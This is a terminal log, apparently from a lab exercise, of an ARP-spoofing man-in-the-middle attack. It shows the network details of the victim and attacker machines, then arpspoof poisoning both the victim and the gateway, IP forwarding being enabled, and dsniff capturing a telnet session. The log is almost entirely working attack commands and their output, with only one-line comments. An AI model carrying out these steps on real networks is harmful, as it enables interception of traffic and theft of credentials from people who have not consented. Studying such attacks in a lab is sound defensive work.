C:\Users\Administrator>arp -a

Interface: 10.90.0.101 --- 0xc
  Internet Address      Physical Address      Type
  10.90.0.1             c4-ad-34-60-6b-87     dynamic
  10.90.0.100           00-50-56-84-94-29     dynamic

--------------------------------------------------------------------------
C:\Users\Administrator>ipconfig

Windows IP Configuration


Ethernet adapter Ethernet0:

   Connection-specific DNS Suffix  . :
   Link-local IPv6 Address . . . . . : fe80::b534:ff09:f62e:e671%12
   IPv4 Address. . . . . . . . . . . : 10.90.0.101
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 10.90.0.1

--------------------------------------------------------------------------

──(kali㉿kali)-[~]
└─$ ip a                                  
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host noprefixroute 
       valid_lft forever preferred_lft forever
3: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 00:50:56:84:a8:46 brd ff:ff:ff:ff:ff:ff
    inet 10.90.0.254/24 brd 10.90.0.255 scope global noprefixroute eth0
       valid_lft forever preferred_lft forever
    inet6 fe80::f6bc:cea1:7d8c:49c4/64 scope link noprefixroute 
       valid_lft forever preferred_lft forever
                                                                                                                    
┌──(kali㉿kali)-[~]
└─$ 

--------------------------------------------------------------------------
# spoof the mac address of the gateway
┌──(kali㉿kali)-[~]
└─$ sudo arpspoof -t 10.90.0.101 10.90.0.1 
[sudo] password for kali: 
0:50:56:84:a8:46 0:50:56:8d:79:28 0806 42: arp reply 10.90.0.1 is-at 0:50:56:84:a8:46
0:50:56:84:a8:46 0:50:56:8d:79:28 0806 42: arp reply 10.90.0.1 is-at 0:50:56:84:a8:46
0:50:56:84:a8:46 0:50:56:8d:79:28 0806 42: arp reply 10.90.0.1 is-at 0:50:56:84:a8:46
0:50:56:84:a8:46 0:50:56:8d:79:28 0806 42: arp reply 10.90.0.1 is-at 0:50:56:84:a8:46

# spoof the mac address of client
──(root㉿kali)-[~]
└─# arpspoof -i eth0 -t 10.90.0.1 10.90.0.101
0:50:56:84:a8:46 c4:ad:34:60:6b:87 0806 42: arp reply 10.90.0.101 is-at 0:50:56:84:a8:46
0:50:56:84:a8:46 c4:ad:34:60:6b:87 0806 42: arp reply 10.90.0.101 is-at 0:50:56:84:a8:46
0:50:56:84:a8:46 c4:ad:34:60:6b:87 0806 42: arp reply 10.90.0.101 is-at 0:50:56:84:a8:46


--------------------------------------------------------------------------
# Allow to forward traffic to the target
──(root㉿kali)-[~]                                      
└─# sysctl -w net.ipv4.ip_forward=1                        
net.ipv4.ip_forward = 1                                  
                                                        
--------------------------------------------------------------------------
┌──(root㉿kali)-[~]
└─# dsniff -i eth0
dsniff: listening on eth0
-----------------
04/27/24 20:20:55 tcp 10.90.0.101.50888 -> vcube1.kolonet.uk.23 (telnet)
...
...

--------------------------------------------------------------------------
